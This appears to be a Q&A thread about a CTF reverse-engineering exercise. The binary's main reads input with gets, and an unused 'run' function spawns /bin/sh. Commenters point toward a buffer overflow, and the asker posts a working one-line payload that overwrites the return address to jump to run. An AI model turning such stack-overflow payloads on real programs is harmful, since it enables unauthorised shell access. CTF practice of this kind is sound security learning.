I'm trying to reverse engineer a binary in a CTF challenge. I have the following assembly code:

   │0x8048444 <run>                 push   %ebp                                         
   │0x8048445 <run+1>               mov    %esp,%ebp                                    
   │0x8048447 <run+3>               sub    $0x18,%esp                                   
   │0x804844a <run+6>               mov    0x80497c0,%eax                               
   │0x804844f <run+11>              mov    %eax,%edx                                    
   │0x8048451 <run+13>              mov    $0x8048570,%eax                              
   │0x8048456 <run+18>              mov    %edx,0xc(%esp)                               
   │0x804845a <run+22>              movl   $0x13,0x8(%esp)                              
   │0x8048462 <run+30>              movl   $0x1,0x4(%esp)                               
   │0x804846a <run+38>              mov    %eax,(%esp)                                  
   │0x804846d <run+41>              call   0x8048350 <fwrite@plt>                       
   │0x8048472 <run+46>              movl   $0x8048584,(%esp)                            
   │0x8048479 <run+53>              call   0x8048360 <system@plt>                       
   │0x804847e <run+58>              leave                                               
   │0x804847f <run+59>              ret                                                
   │0x8048480 <main>                push   %ebp                                         
   │0x8048481 <main+1>              mov    %esp,%ebp                                    
   │0x8048483 <main+3>              and    $0xfffffff0,%esp                             
   │0x8048486 <main+6>              sub    $0x50,%esp                                   
   │0x8048489 <main+9>              lea    0x10(%esp),%eax                              
   │0x804848d <main+13>             mov    %eax,(%esp)                                  
   │0x8048490 <main+16>             call   0x8048340 <gets@plt>                         
   │0x8048495 <main+21>             leave                         
   │0x8048496 <main+22>             ret

Now as you can see, there is a function 'run' before the main. This function will open a shell as the flag user. x/s 0x8048584 = "/bin/sh". All I need to do is to run the program, but instead of starting it from the main, I need to start it from the run function. I cannot compile or use the linker, the binary must remain as-is. Is there a way to do this? If so, how?

  • 1
    You could start the program in a debugger, set a break point for main and then, when the break point is reached, tell the debugger to jump to run. Depending on your platform (which you didn't tell us), some platform specific trick might be possible as well. – fuz Apr 15 at 15:06
  • 1
    Hint: You should run almost all of main before run. Also, google gets for another hint. – EOF Apr 15 at 15:06
  • Ah yes, I managed to use a buffer overflow to jump on run. That being said, fwrite does get executed and outputs on stdout, but system isn't executed (or is it ?) and then segfaults. Here is the exploit I'm using for now: python -c 'print "a"*76 + "\x44\x84\x04\x08"' | ./level1 – Jon Nimrod Apr 15 at 16:22
  • I think you're supposed to reach run by replacing the return address of main, not with that as the process entry point. But if you did want to do that, running from inside a debugger makes it easy to j *0x8048444 or whatever. – Peter Cordes Apr 16 at 5:31

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